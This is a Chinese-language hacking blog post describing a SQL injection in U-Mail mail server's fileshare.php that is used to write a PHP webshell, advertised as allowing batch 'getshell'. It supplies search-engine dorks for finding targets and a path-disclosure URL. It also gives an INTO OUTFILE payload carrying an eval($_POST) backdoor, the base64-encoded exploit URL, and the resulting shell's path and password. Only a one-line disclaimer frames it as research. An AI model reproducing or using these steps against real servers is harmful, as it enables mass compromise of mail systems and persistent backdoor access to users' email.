U-Mail注入之任意代码写入(可批量Getshell)

2016-2-26 admin 黑客与极客

u-mail中某个文件(fileshare.php)由于参数过滤不严谨导致产生了SQL注入,

通过此漏洞可以将shell写入到web目录下,可批量getshell。

Baidu & Google Keywords:

——————————————————————————-
Power by U-Mail                                                                     *
U-Mail邮件服务器 – Power by U-Mail                                      *
精准反垃圾,有效过滤超过98.6%的垃圾邮件                         *
病毒邮件有效拦截率超过99.9%
;                                           *
*
等等…自由构造!                                                                     *
——————————————————————————-

漏洞利用:

要想写入shell必须知道其物理路径对吧,可通过此方法获取物理路径,大家还可以继续研究:

http://xxx.com/webmail/userapply.php?execadd=333&DomainID=111

得到物理路径:E:umailWorldClienthtmluserapply.php

注入webshell代码:

aa’ union select 1,2,3,4,5,6,'<?php eval($_POST[shell]);?>’,8,9,10,11,12,13,14 into outfile ‘E:/umail/WorldClient/html/08sec.php’#

将其base64加密一下,记得路径是“/”,而不是””

得到:

YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BP

U1Rbc2hlbGxdKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0ZmlsZSAn

RTovdW1haWwvV29ybGRDbGllbnQvaHRtbC8wOHNlYy5waHAnIw==

然后访问…..

http://xxx.com/webmail/fileshare.php?file=YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1

BPU1Rbc2hlbGxdKTs/PicsOCw5LDEwLDExLDEyLDEzLDE0IGludG8gb3V0Zmls

ZSAnRTovdW1haWwvV29ybGRDbGllbnQvaHRtbC8wOHNlYy5waHAnIw==

就将shell写进了web目录中,shell地址:http://xxx.com/webmail/08sec.php  password:shell

声明:漏洞仅供研究,请勿用于非法用途,否则后果自负

发表评论:

Powered by X兵器库 桂ICP备16000990号
sitemap
返回顶部